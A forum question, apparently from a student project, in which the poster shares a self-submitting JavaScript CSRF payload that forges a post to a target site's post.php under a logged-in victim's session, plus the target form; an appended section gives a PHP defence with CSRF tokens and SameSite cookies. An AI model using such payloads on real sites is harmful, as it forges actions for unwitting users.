I am working on a project where I have to carry out CSRF on a web page. So when the user is logged in and when he clicks on my webpage, I have to post with his username (derived from the cookie).
I tried creating my own form using the following code, so that when the user clicks my webpage, this form will post into post.php (target webpage):
<html>
<script language="javascript">
function blah() {
alert();
var theForm, newInput1, newInput2, newInput3;
var bla = "Aaada";
var bla2 ="POST";
// Start by creating a <form>
theForm = document.createElement("form");
theForm.action = "http://targeturl/post.php";
theForm.method = "post";
newInput1 = document.createElement("input");
newInput1.type = "text";
newInput1.name = "username";
newInput1.value = bla;
newInput2 = document.createElement("textarea");
newInput2.name = "message";
newInput2.value = bla;
newInput2.id = "message";
newInput3 = document.createElement("input");
newInput3.type = "submit";
newInput3.name = "post_submit";
newInput3.value = bla2;
newInput3.id = "post_submit";
theForm.appendChild(newInput3);
theForm.appendChild(newInput2);
theForm.appendChild(newInput1);
theForm.submit();
}
blah();
</script>
</html>
Title, Message and Submit button are the three inputs in the target form. When I try running this form, the submit button alone is not set. I am not able to understand why. I tried an actual form in HTML (with ) and posted it to the target URL, and it works.
But since I have to be stealthy, I have to manually build the form, like the code I have posted. I tried all possibilities and I am not able to nail the actual reason why this variable is not setting.
PS:
if (isset($_POST['post_submit'])) {
is the check in the target page,
and below is the target form:
<form method="post" action="post.php">
Title: <input type="text" name="title" maxlength="50"/>
<br />
<br />
Posting:
<br />
<br />
<textarea name="message" cols="120" rows="10" id="message"></textarea>
<br />
<br />
<input name="post_submit" type="submit" id="post_submit" value="POST" />
</form>
(It posts to itself, I have not included the remaining code of target)
Any help would be appreciated. Thanks
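
Seen from the defending side, the `isset($_POST['post_submit'])` check quoted above cannot tell the site's own form from one submitted by another origin. The following is an added example, not part of the original post and not the target's real code: post.php with a per-session synchronizer token and a SameSite session cookie. The `csrf_token` field name, the `$_SESSION['username']` key, the `csrf_ok()` helper and PHP 7.3+ are assumptions.

```php
<?php
declare(strict_types=1);

// SameSite=Strict: the browser omits the session cookie on cross-site POSTs.
session_set_cookie_params(['httponly' => true, 'samesite' => 'Strict']);
session_start();

// Synchronizer token: one random value per session, kept server-side.
if (empty($_SESSION['csrf_token'])) {
    $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
}

// Hypothetical helper: true only if the posted token matches the session's.
function csrf_ok(array $post, array $session): bool
{
    $sent = $post['csrf_token'] ?? '';
    $expected = $session['csrf_token'] ?? '';
    // is_string() guards against csrf_token[]=... arriving as an array.
    return is_string($sent) && is_string($expected) && $expected !== ''
        && hash_equals($expected, $sent);   // constant-time comparison
}

if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['post_submit'])) {
    if (!csrf_ok($_POST, $_SESSION)) {
        http_response_code(403);
        exit('Invalid or missing CSRF token');
    }
    // The author comes from the server-side session (assumed key),
    // never from a posted field or a client-readable cookie value.
    $author = $_SESSION['username'] ?? null;
    if (!is_string($author)) {
        http_response_code(401);
        exit('Not logged in');
    }
    $title   = is_string($_POST['title'] ?? null) ? $_POST['title'] : '';
    $message = is_string($_POST['message'] ?? null) ? $_POST['message'] : '';
    // Storage of the post is not shown on the page; echo it back escaped.
    echo '<p>', htmlspecialchars("$author: $title / $message", ENT_QUOTES), '</p>';
}
$token = htmlspecialchars($_SESSION['csrf_token'], ENT_QUOTES);
?>
<form method="post" action="post.php">
  <input type="hidden" name="csrf_token" value="<?= $token ?>" />
  Title: <input type="text" name="title" maxlength="50"/>
  <textarea name="message" cols="120" rows="10" id="message"></textarea>
  <input name="post_submit" type="submit" id="post_submit" value="POST" />
</form>
```

A page on another origin cannot read the token out of the session or the rendered form, so a request it builds fails `csrf_ok()` and gets a 403 even when the browser attaches the session cookie.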